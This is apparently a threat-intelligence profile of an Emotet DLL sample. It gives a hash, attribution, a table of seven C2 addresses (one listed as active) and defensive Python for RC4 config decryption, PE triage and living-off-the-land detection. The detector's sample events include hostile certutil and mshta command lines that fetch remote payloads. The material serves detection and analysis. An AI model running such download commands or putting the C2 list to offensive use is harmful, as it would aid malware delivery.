File Identity
| SHA256 | e8444339164268d9e22cc3c1e8a08da91ddc24f90c39059a7f5e4d4a4d42a965 |
|---|---|
| File Name | Emotet Payload: 32-bit DLL.dll |
| Size | 193,536 bytes |
| String Count | 327 (very heavily packed) |
RC4-Encrypted C2 Fragment
122C2J2p2 -- RC4/AES-encrypted C2 config fragment -- only 327 strings in a 193 KB DLL is typical of Emotet's heavily packed, high-entropy payloads
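As an added example (my code, not the KEYDAL page's tooling or anything from Emotet itself), the Python below shows how an RC4-encrypted C2 list is recovered once the key is known: a plain RC4 implementation, a decoder for an assumed fixed-size entry layout, and a plausibility filter, because a wrong key still "decrypts" to bytes that parse as IP:port pairs. The key, the entry layout (4 raw IPv4 bytes plus a little-endian port, zero-terminated) and the encrypted blob are all constructed for the example; the real sample's key and config layout are not on this page.

```python
import struct
from typing import List, Tuple


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). The same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Assumed entry layout for the decrypted list (hypothetical, chosen for this example):
# 4 raw IPv4 bytes followed by a little-endian 16-bit port; an all-zero IP ends the list.
ENTRY = struct.Struct("<4sH")


def parse_c2_list(plain: bytes) -> List[Tuple[str, int]]:
    servers = []
    for off in range(0, len(plain) - ENTRY.size + 1, ENTRY.size):
        raw_ip, port = ENTRY.unpack_from(plain, off)
        if raw_ip == b"\x00\x00\x00\x00":
            break
        servers.append((".".join(str(b) for b in raw_ip), port))
    return servers


def plausible(ip: str, port: int) -> bool:
    """Cheap sanity filter: a wrong key still yields bytes that parse as IP:port."""
    first = int(ip.split(".")[0])
    return 1 <= first <= 223 and first != 127 and port != 0


def decrypt_c2_config(key: bytes, blob: bytes) -> List[Tuple[str, int]]:
    return [(ip, port) for ip, port in parse_c2_list(rc4_crypt(key, blob))
            if plausible(ip, port)]


# Constructed sample: encrypt a known list with a made-up key so the example runs offline.
SAMPLE_KEY = b"example-key-not-real"
SAMPLE_SERVERS = [("41.216.188.11", 8000), ("144.91.65.153", 7080), ("5.135.183.154", 8080)]
_plain = b"".join(ENTRY.pack(bytes(int(o) for o in ip.split(".")), port)
                  for ip, port in SAMPLE_SERVERS) + b"\x00" * ENTRY.size
SAMPLE_BLOB = rc4_crypt(SAMPLE_KEY, _plain)

if __name__ == "__main__":
    for ip, port in decrypt_c2_config(SAMPLE_KEY, SAMPLE_BLOB):
        print(f"{ip}:{port}")
```

When working on a real sample, the key is usually found next to the blob (or derived from it) in the `.data` section and the entry layout has to be confirmed by hand; the plausibility filter only tells you that the output looks like addresses, so cross-check at least one decoded entry against a known C2 address before trusting the rest.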
About Emotet
Emotet (Heodo) is a modular botnet infrastructure active since 2014. It was dismantled by the Europol-coordinated takedown in January 2021 and resurfaced in November 2021. Characteristics: polymorphic builds that defeat static signatures, an RC4-encrypted C2 IP list, and delivery of Cobalt Strike and ransomware payloads.
IOC
| SHA256 | e8444339164268d9e22cc3c1e8a08da91ddc24f90c39059a7f5e4d4a4d42a965 |
|---|---|
| C2 | RC4-encrypted IP list embedded in the payload (family-level addresses are in the C2 Servers table) |
Emotet — Malware Profile
Emotet (Heodo; operated by the actor tracked as Mealybug/TA542) 32-bit DLL payload. Process enumeration via CreateToolhelp32Snapshot + Process32First/Process32Next. Shellcode staging via VirtualAlloc + VirtualProtect. Direct ntdll.dll calls that bypass the kernel32 wrappers. Low whole-file entropy of 3.92, consistent with a stage-1 loader carrying an encoded rather than compressed payload. Suspicious (non-default) image base and DOS stub.
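As an added triage example (my code, not the page's or KEYDAL's tooling), the Python below parses just enough of a PE file with the standard library to check the static indicators listed above: the image base (flagged when it is not one of the common linker defaults), the DOS stub text, and Shannon entropy per section rather than for the whole file, plus a raw-byte scan for the API names the profile calls out. `build_sample_pe` and `SAMPLE_PE` are constructed for the example and are not the real sample; the byte scan is a quick check, not an import-table walk.

```python
import math
import random
import struct
from collections import Counter
from typing import Dict, List, Tuple

STD_DOS_STUB = b"This program cannot be run in DOS mode"
COMMON_IMAGE_BASES = {0x00400000, 0x10000000, 0x140000000, 0x180000000}
# API names the profile calls out; this is a raw-byte scan, not an import-table walk.
SUSPECT_APIS = [b"CreateToolhelp32Snapshot", b"Process32First", b"Process32Next",
                b"VirtualAlloc", b"VirtualProtect", b"ntdll.dll"]


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage_pe(data: bytes) -> Dict:
    """Parse only the headers needed for triage: image base, DOS stub, per-section entropy."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:      # PE32: ImageBase is a DWORD at optional-header offset 28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:    # PE32+: ImageBase is a QWORD at offset 24 (no BaseOfData field)
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError(f"unknown optional header magic 0x{magic:x}")
    sections = []
    for i in range(nsections):
        hdr = opt + opt_size + 40 * i
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, hdr)
        body = data[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "raw_size": raw_size, "entropy": round(shannon_entropy(body), 2)})
    return {
        "pe32plus": magic == 0x20B,
        "image_base": image_base,
        "unusual_image_base": image_base not in COMMON_IMAGE_BASES,
        "standard_dos_stub": STD_DOS_STUB in data[0x40:e_lfanew],
        "file_entropy": round(shannon_entropy(data), 2),
        "sections": sections,
        "suspect_apis": [a.decode() for a in SUSPECT_APIS if a in data],
    }


def build_sample_pe(image_base: int, dos_stub: bytes,
                    sections: List[Tuple[bytes, bytes]]) -> bytes:
    """Constructed minimal PE32 (parseable, not loadable) so the example runs offline."""
    e_lfanew, opt_size, align = 0x80, 224, 0x200
    assert len(dos_stub) <= e_lfanew - 0x40
    dos = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    dos[0x3C:0x40] = struct.pack("<I", e_lfanew)
    dos[0x40:0x40 + len(dos_stub)] = dos_stub
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x2102)  # i386 DLL
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 28, image_base)
    headers_len = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    raw_ptr = (headers_len + align - 1) & ~(align - 1)
    first_raw, hdrs, bodies, vaddr = raw_ptr, b"", b"", 0x1000
    for name, body in sections:
        hdrs += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(body), vaddr,
                            len(body), raw_ptr, 0, 0, 0, 0, 0x60000020)
        bodies += body
        raw_ptr += len(body)
        vaddr += (len(body) + 0xFFF) & ~0xFFF
    head = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + hdrs
    return head + b"\0" * (first_raw - len(head)) + bodies


# Constructed sample mimicking the profile: random-looking .text, a mostly-zero .data that
# carries the API name strings, a non-default image base and a replaced DOS stub.
SAMPLE_PE = build_sample_pe(
    0x00C20000, b"custom stub: no DOS message",
    [(b".text", random.Random(1).randbytes(4096)),
     (b".data", b"\0" * 2000 + b"\0".join(SUSPECT_APIS) + b"\0" * 48)])

if __name__ == "__main__":
    for key, value in triage_pe(SAMPLE_PE).items():
        print(key, value)
```

The per-section view is the point: a loader whose encoded payload sits in one section can average out to a whole-file value like 3.92 while the section that matters is close to 8, and conversely an XOR-encoded blob of mostly-ASCII data stays low entropy, so the whole-file number alone does not settle "packed or not".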
Technical Details
Written in C. HTTP C2 with RSA+AES-encrypted traffic. Modular design (email stealer, spreader, Outlook harvester). Process hollowing. Living off the land via regsvr32, mshta and certutil. Operated as separate Epoch1/2/3/4/5 botnets.
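The living-off-the-land binaries named above are the part of this profile a SOC can act on directly. As an added example (my code, not the page's or KEYDAL's), here is detection logic in Python over constructed Sysmon process-creation events: regsvr32 registering a DLL from a user-writable path (how a dropped Emotet DLL gets launched), mshta given a URL or inline script, and certutil used as a downloader or decoder. Field names follow Sysmon Event ID 1; the events, hosts and paths are constructed.

```python
import re
from typing import Dict, List, Tuple

# Paths a standard user can write to; a DLL registered from here is worth a look.
USER_WRITABLE = re.compile(r"\\(Users|ProgramData|Temp)\\", re.IGNORECASE)
TOKEN = re.compile(r'"[^"]*"|\S+')


def split_cmdline(cmdline: str) -> List[str]:
    """Windows-style split: keep quoted paths with spaces together, drop the quotes."""
    return [t.strip('"') for t in TOKEN.findall(cmdline)]


def lotl_findings(event: Dict[str, str]) -> List[str]:
    """Return human-readable findings for one process-creation event (empty if benign)."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    args = split_cmdline(event["CommandLine"])[1:]
    low = [a.lower() for a in args]
    findings = []
    if image == "regsvr32.exe":
        dlls = [a for a in args if USER_WRITABLE.search(a)]
        if dlls:
            findings.append(f"regsvr32 registering DLL from user-writable path: {dlls[0]}")
    elif image == "mshta.exe":
        if any(a.startswith(("http:", "https:", "javascript:", "vbscript:")) for a in low):
            findings.append("mshta running remote or inline script")
    elif image == "certutil.exe":
        hits = [a for a in low if a in ("-urlcache", "-decode", "-decodehex")]
        if hits:
            findings.append(f"certutil used as downloader/decoder ({hits[0]})")
    return findings


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    return [(e["ProcessId"], f) for e in events for f in lotl_findings(e)]


# Constructed events using Sysmon Event ID 1 field names; none are from a real host.
SAMPLE_EVENTS = [
    {"ProcessId": "4412", "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Users\bob\AppData\Local\Temp\Emotet Payload.dll"'},
    {"ProcessId": "4420", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Windows\System32\scrrun.dll"},
    {"ProcessId": "4520", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe http://203.0.113.7/p.hta"},
    {"ProcessId": "4608", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.7/a.bin C:\ProgramData\a.bin"},
    {"ProcessId": "4700", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -verify C:\Users\bob\cert.cer"},
]

if __name__ == "__main__":
    for pid, finding in scan(SAMPLE_EVENTS):
        print(pid, finding)
```

Benign uses (regsvr32 on a System32 DLL, certutil -verify) are left alone; tune USER_WRITABLE to where your installers legitimately drop DLLs. Process hollowing is not visible in process-creation events at all and needs image-load or memory inspection, so this rule set covers only the LotL stage.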
Attribution / Threat Actor
TA542 (MUMMY SPIDER), a group believed to be of Ukrainian origin. Suspects were arrested in Ukraine during the Europol/FBI-led takedown in January 2021; the botnet returned in November 2021.
Capabilities & Behavior
IOC List (1 indicator)
| Type | Value | Note |
|---|---|---|
| sha256 | e8444339164268d9e22cc3c1e8a08da91ddc24f90c39059a7f5e4d4a4d42a965 | 32-bit DLL payload |
C2 Servers (7 recorded servers for this family)
| Address | Type | Port | Protocol | Status | Country |
|---|---|---|---|---|---|
| 41.216.188.11 | ip | 8000 | HTTP | active | — |
| 103.143.173.206 | ip | 443 | HTTPS | inactive | ID |
| 144.91.65.153 | ip | 7080 | HTTP | inactive | DE |
| 195.88.54.144 | ip | 8080 | HTTP | sinkholed | — |
| 103.43.46.149 | ip | 443 | HTTPS | sinkholed | — |
| 185.220.101.32 | ip | 80 | HTTP | sinkholed | DE |
| 5.135.183.154 | ip | 8080 | HTTP | sinkholed | FR |
C2 addresses are provided only from malware samples manually verified by the KEYDAL team. Commercial use is prohibited.
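To show how the table above is used in practice, here is an added example (my code, not KEYDAL's) that loads the seven rows and sweeps constructed firewall log lines against them. The status column drives the verdict: a connection to a sinkholed address still means the host is infected, only the C2 side has been neutralised, and a hit on the address but not the recorded port is kept with lower confidence rather than dropped. The log lines and internal hosts are constructed.

```python
import ipaddress
import re
from typing import Dict, List, Tuple

# Copied from the C2 Servers table above (family-level, not sample-specific).
C2_TABLE = """
41.216.188.11   8000 HTTP  active
103.143.173.206 443  HTTPS inactive
144.91.65.153   7080 HTTP  inactive
195.88.54.144   8080 HTTP  sinkholed
103.43.46.149   443  HTTPS sinkholed
185.220.101.32  80   HTTP  sinkholed
5.135.183.154   8080 HTTP  sinkholed
"""

VERDICT = {
    "active": "confirmed C2 contact: isolate host",
    "sinkholed": "beacon to sinkholed C2: host is infected, C2 side neutralised",
    "inactive": "contact with retired C2: check timestamp against the infection window",
}


def load_c2(table: str) -> Dict[str, Tuple[int, str]]:
    """ip -> (port, status); ipaddress validates octets so a typo in the table fails loudly."""
    c2 = {}
    for line in table.strip().splitlines():
        ip, port, _proto, status = line.split()
        c2[str(ipaddress.ip_address(ip))] = (int(port), status)
    return c2


# Constructed key=value firewall log format; nothing here is from a real network.
LOG_RE = re.compile(r"src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)")


def match_logs(log: str, c2: Dict[str, Tuple[int, str]]) -> List[Dict[str, object]]:
    hits = []
    for line in log.strip().splitlines():
        m = LOG_RE.search(line)
        if not m or m["dst"] not in c2:
            continue
        port, status = c2[m["dst"]]
        hits.append({
            "src": m["src"], "dst": m["dst"], "status": status,
            "verdict": VERDICT[status],
            # Same address on another port is still worth a look, with lower confidence.
            "port_match": int(m["dport"]) == port,
        })
    return hits


SAMPLE_LOG = """
2024-05-01T10:00:01Z src=10.0.0.5 dst=195.88.54.144 dport=8080 action=allow
2024-05-01T10:00:02Z src=10.0.0.5 dst=198.51.100.20 dport=443 action=allow
2024-05-01T10:00:05Z src=10.0.0.9 dst=41.216.188.11 dport=8000 action=allow
2024-05-01T10:00:07Z src=10.0.0.9 dst=144.91.65.153 dport=443 action=deny
"""

if __name__ == "__main__":
    for hit in match_logs(SAMPLE_LOG, load_c2(C2_TABLE)):
        print(hit)
```

A denied connection (the last sample line) is still a hit: the endpoint tried to reach the C2, which is the infection signal, regardless of whether the firewall let it through.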